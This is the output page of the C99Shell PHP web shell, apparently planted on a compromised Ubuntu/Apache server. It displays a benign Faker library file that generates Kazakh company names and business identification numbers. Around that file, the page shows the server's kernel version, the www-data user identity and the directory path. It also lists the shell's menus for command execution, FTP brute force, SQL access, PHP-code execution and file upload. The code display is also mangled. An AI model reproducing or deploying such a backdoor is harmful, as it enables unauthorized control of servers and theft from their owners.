!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/vendor/fakerphp/faker/src/Faker/Provider/kk_KZ/   drwxrwxr-x
Free 13.12 GB of 57.97 GB (22.64%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Company.php (2.5 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Faker\Provider\kk_KZ;

class 
Company extends \Faker\Provider\Company
{
    protected static 
$companyNameFormats = [
        
'{{companyPrefix}} {{companyNameElement}}',
        
'{{companyPrefix}} {{companyNameElement}}{{companyNameElement}}',
        
'{{companyPrefix}} {{companyNameElement}}{{companyNameElement}}{{companyNameElement}}',
        
'{{companyPrefix}} {{companyNameElement}}{{companyNameElement}}{{companyNameElement}}{{companyNameSuffix}}',
    ];

    protected static 
$companyPrefixes = [
        
'АҚ''ЖШС''ЖАҚ',
    ];

    protected static 
$companyNameSuffixes = [
        
'Құрылыс''Машина''Бұзу''-М''Лизинг''Страх''Ком''Телеком',
    ];

    protected static 
$companyElements = [
        
'Қазақ''Кітап''Цемент''Лифт''Креп''Авто''Теле''Транс''Алмаз''Метиз',
        
'Мотор''Қаз''Тех''Сантех''Алматы''Астана''Электро',
    ];

    
/**
     * @example 'ЖШС АлматыТелеком'
     */
    
public function company()
    {
        
$format = static::randomElement(static::$companyNameFormats);

        return 
$this->generator->parse($format);
    }

    public static function 
companyPrefix()
    {
        return static::
randomElement(static::$companyPrefixes);
    }

    public static function 
companyNameElement()
    {
        return static::
randomElement(static::$companyElements);
    }

    public static function 
companyNameSuffix()
    {
        return static::
randomElement(static::$companyNameSuffixes);
    }

    
/**
     * National Business Identification Numbers
     *
     * @see   http://egov.kz/wps/portal/Content?contentPath=%2Fegovcontent%2Fbus_business%2Ffor_businessmen%2Farticle%2Fbusiness_identification_number&lang=en
     *
     * @param \DateTime $registrationDate
     *
     * @return string 12 digits, like 150140000019
     */
    
public static function businessIdentificationNumber(\DateTime $registrationDate null)
    {
        if (!
$registrationDate) {
            
$registrationDate \Faker\Provider\DateTime::dateTimeThisYear();
        }

        
$dateAsString $registrationDate->format('ym');
        
$legalEntityType = (string) self::numberBetween(46);
        
$legalEntityAdditionalType = (string) self::numberBetween(03);
        
$randomDigits = (string) static::numerify('######');

        return 
$dateAsString $legalEntityType $legalEntityAdditionalType $randomDigits;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--